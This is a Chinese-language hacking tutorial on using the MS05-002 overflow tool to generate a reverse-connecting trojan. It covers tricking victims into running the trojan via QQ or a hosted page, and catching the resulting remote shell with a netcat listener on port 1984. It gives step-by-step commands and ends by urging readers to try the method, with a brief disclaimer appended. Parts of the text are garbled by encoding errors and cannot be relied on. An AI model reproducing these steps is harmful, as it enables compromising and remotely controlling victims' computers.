黑客如何利用Ms05002溢出找“肉雞” (圖)
實施方法:通過Ms05002攻擊工具,溢出反彈IP、反彈端口,會生成含有木馬性質(zhì)的文件。然后將這個產(chǎn)生的文件,以QQ傳輸?shù)男问桨l(fā)給受害者觀看,或者將其上傳到自己的主頁空間,引誘其他人訪問。最后執(zhí)行NC瑞士軍刀,監(jiān)聽本機端口,收取已經(jīng)運行產(chǎn)生文件的主機。
步驟1.首先從網(wǎng)上下載Ms05002溢出工具,釋放到比較理想的硬盤驅(qū)動器中,然后在CMD命令行下,輸入軟件名稱啟動該程序,會出現(xiàn)一些英文形式的幫助信息(如圖1)。
圖1
小提示:Ms05002溢出工具,是一款需要在命令行下支持運行的程序,它可以通過溢出反彈的IP地址,生成木馬服務(wù)端。這點與其他溢出程序是完全不同,而且效率相比之下,也有明顯的提高,真不愧是即所有溢出程序的升級版本?! 〔襟E2.繼續(xù)在其下的命令行處,輸入命令Ms05002 要生成的木馬文件名 本地機器IP地址 溢出端口(如圖2),然后敲擊“回車鍵”執(zhí)行。屏幕會不停的向上滾動,這時還會出現(xiàn)帶有兩句“OK”的字母提示,說明木馬文件已經(jīng)生成完畢了。
圖 2
步驟3.通常溢出過后,都需要監(jiān)聽工具來抓捕肉雞。這里也不例外,跳轉(zhuǎn)到事先準(zhǔn)備的NC工具所在目錄,然后在其命令行處輸入NC –VV –L –P 1984的監(jiān)聽命令,并敲擊“回車”鍵,開始監(jiān)聽本地1984端口的信息出入。
小提示:NC監(jiān)聽軟件-VV參數(shù)代表,得到更詳細(xì)的輸入監(jiān)聽內(nèi)容。-L代表連接端口關(guān)閉后,仍然繼續(xù)監(jiān)聽。-P進(jìn)行監(jiān)聽本地端口,后跟數(shù)字就是所要監(jiān)聽的端口號。
步驟4.將溢出生成的木馬,以QQ形式發(fā)給網(wǎng)友運行,或者上傳到自己的個人空間中,騙取受害者瀏覽運行。如果用戶不幸查看所發(fā)去的木馬,正在本機監(jiān)聽的NC等待狀況,就會改為可操作命令行(如圖3)。而此時的命令操作平臺,也正是遠(yuǎn)方主機的SHELL平臺(有關(guān)SHELL的解釋,已經(jīng)在前幾篇文章中敘述過,這里就不做過多講解了),現(xiàn)在你就可以在其主機上,為所欲為的以命令形式操控機器。
圖 3
結(jié)束語:最快捷和最靈驗的“抓雞”方法,已經(jīng)擺在您面前了。還在猶豫什么?趕快前去一試此妙法吧!
注:本文最主要的目的是介紹黑客如何攻擊你電腦的,任何人不得利用本文介紹的技術(shù)作非法的事情。